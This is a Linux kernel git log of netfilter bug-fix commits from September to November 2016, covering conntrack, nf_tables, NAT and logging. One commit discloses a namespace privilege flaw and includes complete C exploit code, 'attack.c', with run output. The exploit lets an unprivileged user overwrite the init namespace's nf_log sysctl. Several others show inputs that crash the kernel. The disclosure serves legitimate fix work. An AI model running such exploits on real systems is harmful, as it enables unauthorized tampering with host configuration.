24 Nov, 2016

5 commits

  • Otherwise, kernel panic will happen if the user does not specify
    the related attributes.

    Fixes: 0f3cd9b36977 ("netfilter: nf_tables: add range expression")
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • As Liping Zhang reports, after commit a8b1e36d0d1d ("netfilter: nft_dynset:
    fix element timeout for HZ != 1000"), priv->timeout was stored in jiffies,
    while set->timeout was stored in milliseconds. This is inconsistent and
    incorrect.

    Firstly, we already call msecs_to_jiffies in nft_set_elem_init, so
    priv->timeout will be converted to jiffies twice.

    Secondly, if the user did not specify the NFTA_DYNSET_TIMEOUT attr,
    set->timeout will be used, but we forget to call msecs_to_jiffies
    when do update elements.

    Fix this by using jiffies internally for traditional sets and doing the
    conversions to/from msec when interacting with userspace - as dynset
    already does.

    This is preferable to doing the conversions, when elements are inserted or
    updated, because this can happen very frequently on busy dynsets.

    Fixes: a8b1e36d0d1d ("netfilter: nft_dynset: fix element timeout for HZ != 1000")
    Reported-by: Liping Zhang
    Signed-off-by: Anders K. Pedersen
    Acked-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Anders K. Pedersen
     
  • I got offlist bug report about failing connections and high cpu usage.
    This happens because we hit 'elasticity' checks in rhashtable that
    refuses bucket list exceeding 16 entries.

    The nat bysrc hash unfortunately needs to insert distinct objects that
    share same key and are identical (have same source tuple), this cannot
    be avoided.

    Switch to the rhlist interface which is designed for this.

    The nulls_base is removed here, I don't think its needed:

    A (unlikely) false positive results in unneeded port clash resolution,
    a false negative results in packet drop during conntrack confirmation,
    when we try to insert the duplicate into main conntrack hash table.

    Tested by adding multiple ip addresses to host, then adding
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

    ... and then creating multiple connections, from same source port but
    different addresses:

    for i in $(seq 2000 2032);do nc -p 1234 192.168.7.1 $i > /dev/null & done

    (all of these then get hashed to same bysource slot)

    Then, to test that nat conflict resultion is working:

    nc -s 10.0.0.1 -p 1234 192.168.7.1 2000
    nc -s 10.0.0.2 -p 1234 192.168.7.1 2000

    tcp .. src=10.0.0.1 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1024 [ASSURED]
    tcp .. src=10.0.0.2 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1025 [ASSURED]
    tcp .. src=192.168.7.10 dst=192.168.7.1 sport=1234 dport=2000 src=192.168.7.1 dst=192.168.7.10 sport=2000 dport=1234 [ASSURED]
    tcp .. src=192.168.7.10 dst=192.168.7.1 sport=1234 dport=2001 src=192.168.7.1 dst=192.168.7.10 sport=2001 dport=1234 [ASSURED]
    [..]

    -> nat altered source ports to 1024 and 1025, respectively.
    This can also be confirmed on destination host which shows
    ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1024
    ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1025
    ESTAB 0 0 192.168.7.1:2000 192.168.7.10:1234

    Cc: Herbert Xu
    Fixes: 870190a9ec907 ("netfilter: nat: convert nat bysrc hash to rhashtable")
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     
  • The comparator works like memcmp, i.e. 0 means objects are equal.
    In other words, when objects are distinct they are treated as identical,
    when they are distinct they are allegedly the same.

    The first case is rare (distinct objects are unlikely to get hashed to
    same bucket).

    The second case results in unneeded port conflict resolutions attempts.

    Fixes: 870190a9ec907 ("netfilter: nat: convert nat bysrc hash to rhashtable")
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     
  • Use the function nft_parse_u32_check() to fetch the value and validate
    the u32 attribute into the hash len u8 field.

    This patch revisits 4da449ae1df9 ("netfilter: nft_exthdr: Add size check
    on u8 nft_exthdr attributes").

    Fixes: cb1b69b0b15b ("netfilter: nf_tables: add hash expression")
    Signed-off-by: Laura Garcia Liebana
    Signed-off-by: Pablo Neira Ayuso

    Laura Garcia Liebana
     

09 Nov, 2016

5 commits

  • Dalegaard says:
    The following ruleset, when loaded with 'nft -f bad.txt'
    ----snip----
    flush ruleset
    table ip inlinenat {
    map sourcemap {
    type ipv4_addr : verdict;
    }

    chain postrouting {
    ip saddr vmap @sourcemap accept
    }
    }
    add chain inlinenat test
    add element inlinenat sourcemap { 100.123.10.2 : jump test }
    ----snip----

    results in a kernel oops:
    BUG: unable to handle kernel paging request at 0000000000001344
    IP: [] nf_tables_check_loops+0x114/0x1f0 [nf_tables]
    [...]
    Call Trace:
    [] ? nft_data_init+0x13e/0x1a0 [nf_tables]
    [] nft_validate_register_store+0x60/0xb0 [nf_tables]
    [] nft_add_set_elem+0x545/0x5e0 [nf_tables]
    [] ? nft_table_lookup+0x30/0x60 [nf_tables]
    [] ? nla_strcmp+0x40/0x50
    [] nf_tables_newsetelem+0x11e/0x210 [nf_tables]
    [] ? nla_validate+0x60/0x80
    [] nfnetlink_rcv+0x354/0x5a7 [nfnetlink]

    Because we forget to fill the net pointer in bind_ctx, so dereferencing
    it may cause kernel crash.

    Reported-by: Dalegaard
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • Nicolas Dichtel says:
    After commit b87a2f9199ea ("netfilter: conntrack: add gc worker to
    remove timed-out entries"), netlink conntrack deletion events may be
    sent with a huge delay.

    Nicolas further points at this line:

    goal = min(nf_conntrack_htable_size / GC_MAX_BUCKETS_DIV, GC_MAX_BUCKETS);

    and indeed, this isn't optimal at all. Rationale here was to ensure that
    we don't block other work items for too long, even if
    nf_conntrack_htable_size is huge. But in order to have some guarantee
    about maximum time period where a scan of the full conntrack table
    completes we should always use a fixed slice size, so that once every
    N scans the full table has been examined at least once.

    We also need to balance this vs. the case where the system is either idle
    (i.e., conntrack table (almost) empty) or very busy (i.e. eviction happens
    from packet path).

    So, after some discussion with Nicolas:

    1. want hard guarantee that we scan entire table at least once every X s
    -> need to scan fraction of table (get rid of upper bound)

    2. don't want to eat cycles on idle or very busy system
    -> increase interval if we did not evict any entries

    3. don't want to block other worker items for too long
    -> make fraction really small, and prefer small scan interval instead

    4. Want reasonable short time where we detect timed-out entry when
    system went idle after a burst of traffic, while not doing scans
    all the time.
    -> Store next gc scan in worker, increasing delays when no eviction
    happened and shrinking delay when we see timed out entries.

    The old gc interval is turned into a max number, scans can now happen
    every jiffy if stale entries are present.

    Longest possible time period until an entry is evicted is now 2 minutes
    in worst case (entry expires right after it was deemed 'not expired').

    Reported-by: Nicolas Dichtel
    Signed-off-by: Florian Westphal
    Acked-by: Nicolas Dichtel
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     
  • Thomas reports its not possible to attach the H.245 helper:

    iptables -t raw -A PREROUTING -p udp -j CT --helper H.245
    iptables: No chain/target/match by that name.
    xt_CT: No such helper "H.245"

    This is because H.245 registers as NFPROTO_UNSPEC, but the CT target
    passes NFPROTO_IPV4/IPV6 to nf_conntrack_helper_try_module_get.

    We should treat UNSPEC as wildcard and ignore the l3num instead.

    Reported-by: Thomas Woerner
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     
  • The (percpu) untracked conntrack entries can end up with nonzero connmarks.

    The 'untracked' conntrack objects are merely a way to distinguish INVALID
    (i.e. protocol connection tracker says payload doesn't meet some
    requirements or packet was never seen by the connection tracking code)
    from packets that are intentionally not tracked (some icmpv6 types such as
    neigh solicitation, or by using 'iptables -j CT --notrack' option).

    Untracked conntrack objects are implementation detail, we might as well use
    invalid magic address instead to tell INVALID and UNTRACKED apart.

    Check skb->nfct for untracked dummy and behave as if skb->nfct is NULL.

    Reported-by: XU Tianwen
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     
  • family.maxattr is the max index for policy[], the size of
    ops[] is determined with ARRAY_SIZE().

    Reported-by: Andrey Konovalov
    Tested-by: Andrey Konovalov
    Cc: Pablo Neira Ayuso
    Signed-off-by: Cong Wang
    Signed-off-by: Simon Horman
    Signed-off-by: Pablo Neira Ayuso

    WANG Cong
     

31 Oct, 2016

1 commit


28 Oct, 2016

6 commits

  • Building the ip_vs_sync code with CONFIG_OPTIMIZE_INLINING on x86
    confuses the compiler to the point where it produces a rather
    dubious warning message:

    net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
    struct ip_vs_sync_conn_options opt;
    ^~~
    net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
    net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
    net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
    net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
    net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]

    The problem appears to be a combination of a number of factors, including
    the __builtin_bswap32 compiler builtin being slightly odd, having a large
    amount of code inlined into a single function, and the way that some
    functions only get partially inlined here.

    I've spent way too much time trying to work out a way to improve the
    code, but the best I've come up with is to add an explicit memset
    right before the ip_vs_seq structure is first initialized here. When
    the compiler works correctly, this has absolutely no effect, but in the
    case that produces the warning, the warning disappears.

    In the process of analysing this warning, I also noticed that
    we use memcpy to copy the larger ip_vs_sync_conn_options structure
    over two members of the ip_vs_conn structure. This works because
    the layout is identical, but seems error-prone, so I'm changing
    this in the process to directly copy the two members. This change
    seemed to have no effect on the object code or the warning, but
    it deals with the same data, so I kept the two changes together.

    Signed-off-by: Arnd Bergmann
    Acked-by: Julian Anastasov
    Signed-off-by: Simon Horman
    Signed-off-by: Pablo Neira Ayuso

    Arnd Bergmann
     
  • Commit 36b701fae12ac ("netfilter: nf_tables: validate maximum value of
    u32 netlink attributes") introduced nft_parse_u32_check with a return
    value of "unsigned int", yet on error it returns "-ERANGE".

    This patch corrects the mismatch by changing the return value to "int",
    which happens to match the actual users of nft_parse_u32_check already.

    Found by Coverity, CID 1373930.

    Note that commit 21a9e0f1568ea ("netfilter: nft_exthdr: fix error
    handling in nft_exthdr_init()) attempted to address the issue, but
    did not address the return type of nft_parse_u32_check.

    Signed-off-by: John W. Linville
    Cc: Laura Garcia Liebana
    Cc: Pablo Neira Ayuso
    Cc: Dan Carpenter
    Fixes: 36b701fae12ac ("netfilter: nf_tables: validate maximum value...")
    Signed-off-by: Pablo Neira Ayuso

    John W. Linville
     
  • on SIP requests, so a fragmented TCP SIP packet from an allow header starting with
    INVITE,NOTIFY,OPTIONS,REFER,REGISTER,UPDATE,SUBSCRIBE
    Content-Length: 0

    will not bet interpreted as an INVITE request. Also Request-URI must start with an alphabetic character.

    Confirm with RFC 3261
    Request-Line = Method SP Request-URI SP SIP-Version CRLF

    Fixes: 30f33e6dee80 ("[NETFILTER]: nf_conntrack_sip: support method specific request/response handling")
    Signed-off-by: Ulrich Weber
    Acked-by: Marco Angaroni
    Signed-off-by: Pablo Neira Ayuso

    Ulrich Weber
     
  • Packets may race when create the new element in nft_hash_update:
    CPU0 CPU1
    lookup_fast - fail lookup_fast - fail
    new - ok new - ok
    insert - ok insert - fail(EEXIST)

    So when race happened, we reuse the existing element. Otherwise,
    these *racing* packets will not be handled properly.

    Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates")
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • When nft_expr_clone failed, a series of problems will happen:

    1. module refcnt will leak, we call __module_get at the beginning but
    we forget to put it back if ops->clone returns fail
    2. memory will be leaked, if clone fail, we just return NULL and forget
    to free the alloced element
    3. set->nelems will become incorrect when set->size is specified. If
    clone fail, we should decrease the set->nelems

    Now this patch fixes these problems. And fortunately, clone fail will
    only happen on counter expression when memory is exhausted.

    Fixes: 086f332167d6 ("netfilter: nf_tables: add clone interface to expression operations")
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • When CONFIG_NFT_SET_HASH is not enabled and I input the following rule:
    "nft add rule filter output flow table test {ip daddr counter }", kernel
    panic happened on my system:
    BUG: unable to handle kernel NULL pointer dereference at (null)
    IP: [< (null)>] (null)
    [...]
    Call Trace:
    [] ? nft_dynset_eval+0x56/0x100 [nf_tables]
    [] nft_do_chain+0xfb/0x4e0 [nf_tables]
    [] ? nf_conntrack_tuple_taken+0x61/0x210 [nf_conntrack]
    [] ? get_unique_tuple+0x136/0x560 [nf_nat]
    [] ? __nf_ct_ext_add_length+0x111/0x130 [nf_conntrack]
    [] ? nf_nat_setup_info+0x87/0x3b0 [nf_nat]
    [] ? ipt_do_table+0x327/0x610
    [] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
    [] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
    [] nf_iterate+0x55/0x60
    [] nf_hook_slow+0x73/0xd0

    Because in rbtree type set, ops->update is not implemented. So just keep
    it simple, in such case, report -EOPNOTSUPP to the user space.

    Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates")
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     

21 Oct, 2016

2 commits

  • nf_queue handling is broken since e3b37f11e6e4 ("netfilter: replace
    list_head with single linked list") for two reasons:

    1) If the bypass flag is set on, there are no userspace listeners and
    we still have more hook entries to iterate over, then jump to the
    next hook. Otherwise accept the packet. On nf_reinject() path, the
    okfn() needs to be invoked.

    2) We should not re-enter the same hook on packet reinjection. If the
    packet is accepted, we have to skip the current hook from where the
    packet was enqueued, otherwise the packets gets enqueued over and
    over again.

    This restores the previous list_for_each_entry_continue() behaviour
    happening from nf_iterate() that was dealing with these two cases.
    This patch introduces a new nf_queue() wrapper function so this fix
    becomes simpler.

    Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     
  • When the maximum evictions number is reached, do not wait 5 seconds before
    the next run.

    CC: Florian Westphal
    Signed-off-by: Nicolas Dichtel
    Acked-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Nicolas Dichtel
     

20 Oct, 2016

1 commit

  • Markus Trippelsdorf reports:

    WARNING: kmemcheck: Caught 64-bit read from uninitialized memory (ffff88001e605480)
    4055601e0088ffff000000000000000090686d81ffffffff0000000000000000
    u u u u u u u u u u u u u u u u i i i i i i i i u u u u u u u u
    ^
    |RIP: 0010:[] [] nf_register_net_hook+0x51/0x160
    [..]
    [] nf_register_net_hook+0x51/0x160
    [] nf_register_net_hooks+0x3f/0xa0
    [] ipt_register_table+0xe5/0x110
    [..]

    This warning is harmless; we copy 'uninitialized' data from the hook ops
    but it will not be used.
    Long term the structures keeping run-time data should be disentangled
    from those only containing config-time data (such as where in the list
    to insert a hook), but thats -next material.

    Reported-by: Markus Trippelsdorf
    Suggested-by: Al Viro
    Signed-off-by: Florian Westphal
    Acked-by: Aaron Conole
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal
     

18 Oct, 2016

2 commits

  • The newly added nft_range_eval() function handles the two possible
    nft range operations, but as the compiler warning points out,
    any unexpected value would lead to the 'mismatch' variable being
    used without being initialized:

    net/netfilter/nft_range.c: In function 'nft_range_eval':
    net/netfilter/nft_range.c:45:5: error: 'mismatch' may be used uninitialized in this function [-Werror=maybe-uninitialized]

    This removes the variable in question and instead moves the
    condition into the switch itself, which is potentially more
    efficient than adding a bogus 'default' clause as in my
    first approach, and is nicer than using the 'uninitialized_var'
    macro.

    Fixes: 0f3cd9b36977 ("netfilter: nf_tables: add range expression")
    Link: http://patchwork.ozlabs.org/patch/677114/
    Signed-off-by: Arnd Bergmann
    Signed-off-by: Pablo Neira Ayuso

    Arnd Bergmann
     
  • Use nft_parse_u32_check() to make sure we don't get a value over the
    unsigned 8-bit integer. Moreover, make sure this value doesn't go over
    the two supported range comparison modes.

    Fixes: 9286c2eb1fda ("netfilter: nft_range: validate operation netlink attribute")
    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     

17 Oct, 2016

7 commits

  • "err" needs to be signed for the error handling to work.

    Fixes: 36b701fae12a ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
    Signed-off-by: Dan Carpenter
    Signed-off-by: Pablo Neira Ayuso

    Dan Carpenter
     
  • We don't want to allow negatives here.

    Fixes: 36b701fae12a ('netfilter: nf_tables: validate maximum value of u32 netlink attributes')
    Signed-off-by: Dan Carpenter
    Signed-off-by: Pablo Neira Ayuso

    Dan Carpenter
     
  • Missing the nla_policy description will also miss the validation check
    in kernel.

    Fixes: 70ca767ea1b2 ("netfilter: nft_hash: Add hash offset value")
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • Otherwise, user cannot add related rules if xt_ipcomp.ko is not loaded:
    # iptables -A OUTPUT -p 108 -m ipcomp --ipcompspi 1
    iptables: No chain/target/match by that name.

    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • Justin and Chris spotted that iptables NFLOG target was broken when they
    upgraded the kernel to 4.8: "ulogd-2.0.5- IPs are no longer logged" or
    "results in segfaults in ulogd-2.0.5".

    Because "struct nf_loginfo li;" is a local variable, and flags will be
    filled with garbage value, not inited to zero. So if it contains 0x1,
    packets will not be logged to the userspace anymore.

    Fixes: 7643507fe8b5 ("netfilter: xt_NFLOG: nflog-range does not truncate packets")
    Reported-by: Justin Piszcz
    Reported-by: Chris Caputo
    Tested-by: Chris Caputo
    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • With HZ=100 element timeout in dynamic sets (i.e. flow tables) is 10 times
    higher than configured.

    Add proper conversion to/from jiffies, when interacting with userspace.

    I tested this on Linux 4.8.1, and it applies cleanly to current nf and
    nf-next trees.

    Fixes: 22fe54d5fefc ("netfilter: nf_tables: add support for dynamic set updates")
    Signed-off-by: Anders K. Pedersen
    Signed-off-by: Pablo Neira Ayuso

    Anders K. Pedersen
     
  • On 32-bit (e.g. with m68k-linux-gnu-gcc-4.1):

    net/netfilter/xt_hashlimit.c: In function ‘user2credits’:
    net/netfilter/xt_hashlimit.c:476: warning: integer constant is too large for ‘long’ type
    ...
    net/netfilter/xt_hashlimit.c:478: warning: integer constant is too large for ‘long’ type
    ...
    net/netfilter/xt_hashlimit.c:480: warning: integer constant is too large for ‘long’ type
    ...

    net/netfilter/xt_hashlimit.c: In function ‘rateinfo_recalc’:
    net/netfilter/xt_hashlimit.c:513: warning: integer constant is too large for ‘long’ type

    Fixes: 11d5f15723c9f39d ("netfilter: xt_hashlimit: Create revision 2 to support higher pps rates")
    Signed-off-by: Geert Uytterhoeven
    Acked-by: Vishwanath Pai
    Signed-off-by: Pablo Neira Ayuso

    Geert Uytterhoeven
     

11 Oct, 2016

1 commit

  • Use the correct pattern for singly linked list insertion and
    deletion. We can also calculate the list head outside of the
    mutex.

    Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
    Signed-off-by: Linus Torvalds
    Reviewed-by: Aaron Conole
    Signed-off-by: David S. Miller

    net/netfilter/core.c | 108 ++++++++++++++++-----------------------------------
    1 file changed, 33 insertions(+), 75 deletions(-)

    Linus Torvalds
     

04 Oct, 2016

2 commits

  • After I input the following nftables rule, a panic happened on my system:
    # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second

    divide error: 0000 [#1] SMP
    [ ... ]
    RIP: 0010:[] []
    nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
    Call Trace:
    [] nft_do_chain+0xfb/0x4e0 [nf_tables]
    [] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
    [] ? ipt_do_table+0x327/0x610
    [] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
    [] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
    [] nf_iterate+0x62/0x80
    [] nf_hook_slow+0x73/0xd0
    [] __ip_local_out+0xcd/0xe0
    [] ? ip_forward_options+0x1b0/0x1b0
    [] ip_local_out+0x1c/0x40

    This is because divisor is 64-bit, but we treat it as a 32-bit integer,
    then 0xf00000000 becomes zero, i.e. divisor becomes 0.

    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • nf_log_proc_dostring() used current's network namespace instead of the one
    corresponding to the sysctl file the write was performed on. Because the
    permission check happens at open time and the nf_log files in namespaces
    are accessible for the namespace owner, this can be abused by an
    unprivileged user to effectively write to the init namespace's nf_log
    sysctls.

    Stash the "struct net *" in extra2 - data and extra1 are already used.

    Repro code:

    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include

    char child_stack[1000000];

    uid_t outer_uid;
    gid_t outer_gid;
    int stolen_fd = -1;

    void writefile(char *path, char *buf) {
    int fd = open(path, O_WRONLY);
    if (fd == -1)
    err(1, "unable to open thing");
    if (write(fd, buf, strlen(buf)) != strlen(buf))
    err(1, "unable to write thing");
    close(fd);
    }

    int child_fn(void *p_) {
    if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
    NULL))
    err(1, "mount");

    /* Yes, we need to set the maps for the net sysctls to recognize us
    * as namespace root.
    */
    char buf[1000];
    sprintf(buf, "0 %d 1\n", (int)outer_uid);
    writefile("/proc/1/uid_map", buf);
    writefile("/proc/1/setgroups", "deny");
    sprintf(buf, "0 %d 1\n", (int)outer_gid);
    writefile("/proc/1/gid_map", buf);

    stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
    if (stolen_fd == -1)
    err(1, "open nf_log");
    return 0;
    }

    int main(void) {
    outer_uid = getuid();
    outer_gid = getgid();

    int child = clone(child_fn, child_stack + sizeof(child_stack),
    CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
    |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
    if (child == -1)
    err(1, "clone");
    int status;
    if (wait(&status) != child)
    err(1, "wait");
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child exit status bad");

    char *data = "NONE";
    if (write(stolen_fd, data, strlen(data)) != strlen(data))
    err(1, "write");
    return 0;
    }

    Repro:

    $ gcc -Wall -o attack attack.c -std=gnu99
    $ cat /proc/sys/net/netfilter/nf_log/2
    nf_log_ipv4
    $ ./attack
    $ cat /proc/sys/net/netfilter/nf_log/2
    NONE

    Because this looks like an issue with very low severity, I'm sending it to
    the public list directly.

    Signed-off-by: Jann Horn
    Signed-off-by: Pablo Neira Ayuso

    Jann Horn
     

01 Oct, 2016

3 commits

  • Division of 64bit integers will cause linker error undefined reference
    to `__udivdi3'. Fix this by replacing divisions with div64_64

    Fixes: 11d5f15723c9 ("netfilter: xt_hashlimit: Create revision 2 to ...")
    Signed-off-by: Vishwanath Pai
    Acked-by: Maciej Żenczykowski
    Signed-off-by: Pablo Neira Ayuso

    Vishwanath Pai
     
  • When CONFIG_NETFILTER_INGRESS is unset (or no), we need to handle
    the request for registration properly by dropping the hook. This
    releases the entry during the set.

    Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
    Signed-off-by: Aaron Conole
    Signed-off-by: Pablo Neira Ayuso

    Aaron Conole
     
  • It's possible for nf_hook_entry_head to return NULL. If two
    nf_unregister_net_hook calls happen simultaneously with a single hook
    entry in the list, both will enter the nf_hook_mutex critical section.
    The first will successfully delete the head, but the second will see
    this NULL pointer and attempt to dereference.

    This fix ensures that no null pointer dereference could occur when such
    a condition happens.

    Fixes: e3b37f11e6e4 ("netfilter: replace list_head with single linked list")
    Signed-off-by: Aaron Conole
    Signed-off-by: Pablo Neira Ayuso

    Aaron Conole
     

26 Sep, 2016

4 commits

  • Conflicts:
    net/netfilter/core.c
    net/netfilter/nf_tables_netdev.c

    Resolve two conflicts before pull request for David's net-next tree:

    1) Between c73c24849011 ("netfilter: nf_tables_netdev: remove redundant
    ip_hdr assignment") from the net tree and commit ddc8b6027ad0
    ("netfilter: introduce nft_set_pktinfo_{ipv4, ipv6}_validate()").

    2) Between e8bffe0cf964 ("net: Add _nf_(un)register_hooks symbols") and
    Aaron Conole's patches to replace list_head with single linked list.

    Signed-off-by: Pablo Neira Ayuso

    Pablo Neira Ayuso
     
  • nf_log is used by both nftables and iptables, so use XT_LOG_XXX macros
    here is not appropriate. Replace them with NF_LOG_XXX.

    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • NFTA_LOG_FLAGS attribute is already supported, but the related
    NF_LOG_XXX flags are not exposed to the userspace. So we cannot
    explicitly enable log flags to log uid, tcp sequence, ip options
    and so on, i.e. such rule "nft add rule filter output log uid"
    is not supported yet.

    So move NF_LOG_XXX macro definitions to the uapi/../nf_log.h. In
    order to keep consistent with other modules, change NF_LOG_MASK to
    refer to all supported log flags. On the other hand, add a new
    NF_LOG_DEFAULT_MASK to refer to the original default log flags.

    Finally, if user specify the unsupported log flags or NFTA_LOG_GROUP
    and NFTA_LOG_FLAGS are set at the same time, report EINVAL to the
    userspace.

    Signed-off-by: Liping Zhang
    Signed-off-by: Pablo Neira Ayuso

    Liping Zhang
     
  • Inverse ranges != [a,b] are not currently possible because rules are
    composites of && operations, and we need to express this:

    data < a || data > b

    This patch adds a new range expression. Positive ranges can be already
    through two cmp expressions:

    cmp(sreg, data, >=)
    cmp(sreg, data,

    Pablo Neira Ayuso
     

25 Sep, 2016

1 commit

  • Fabian reports a possible conntrack memory leak (could not reproduce so
    far), however, one minor issue can be easily resolved:

    > cat /proc/net/nf_conntrack | wc -l = 5
    > 4 minutes required to clean up the table.

    We should not report those timed-out entries to the user in first place.
    And instead of just skipping those timed-out entries while iterating over
    the table we can also zap them (we already do this during ctnetlink
    walks, but I forgot about the /proc interface).

    Fixes: f330a7fdbe16 ("netfilter: conntrack: get rid of conntrack timer")
    Reported-by: Fabian Frederick
    Signed-off-by: Florian Westphal
    Signed-off-by: Pablo Neira Ayuso

    Florian Westphal